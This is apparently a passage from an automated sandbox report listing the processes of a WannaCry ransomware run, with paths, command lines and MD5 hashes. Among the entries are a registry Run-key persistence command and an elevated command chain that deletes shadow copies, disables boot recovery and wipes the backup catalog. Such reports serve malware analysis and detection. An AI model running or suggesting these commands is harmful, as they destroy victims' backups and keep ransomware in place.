                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:83
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff772470000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:84
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                                              Imagebase:0x960000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:85
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe vs
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:86
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff772470000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:87
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\reg.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                                              Imagebase:0x580000
                                                                              File size:59'392 bytes
                                                                              MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:88
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:89
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\consent.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:consent.exe 6008 686 000002152F62E5C0
                                                                              Imagebase:0x7ff601bd0000
                                                                              File size:186'704 bytes
                                                                              MD5 hash:DD5032EF160209E470E2612A8A3D5F59
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:90
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:91
                                                                              Start time:02:43:32
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:92
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:93
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                              Imagebase:0x7ff7ca9b0000
                                                                              File size:55'320 bytes
                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:94
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:95
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:96
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:97
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                                              Imagebase:0x960000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:98
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:99
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:100
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff772470000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:101
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:102
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:wmic shadowcopy delete
                                                                              Imagebase:0x750000
                                                                              File size:427'008 bytes
                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:103
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:104
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:105
                                                                              Start time:02:43:33
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:106
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:107
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:108
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:109
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:110
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:111
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:112
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:113
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:114
                                                                              Start time:02:43:34
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:115
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:TaskData\Tor\taskhsvc.exe
                                                                              Imagebase:0x2e0000
                                                                              File size:3'098'624 bytes
                                                                              MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 0%, ReversingLabs
                                                                              Has exited:false

                                                                              Target ID:116
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:117
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:118
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:119
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:120
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:121
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff772470000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:123
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:124
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:125
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:126
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:127
                                                                              Start time:02:43:35
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:128
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:129
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:130
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:131
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:132
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:133
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:134
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:135
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:136
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:137
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:138
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:139
                                                                              Start time:02:43:36
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:140
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:141
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\taskdl.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:taskdl.exe
                                                                              Imagebase:0x400000
                                                                              File size:20'480 bytes
                                                                              MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:142
                                                                              Start time:02:43:37
                                                                              Start date:04/10/2024
                                                                              Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:@WanaDecryptor@.exe
                                                                              Imagebase:0x400000
                                                                              File size:245'760 bytes
                                                                              MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:143
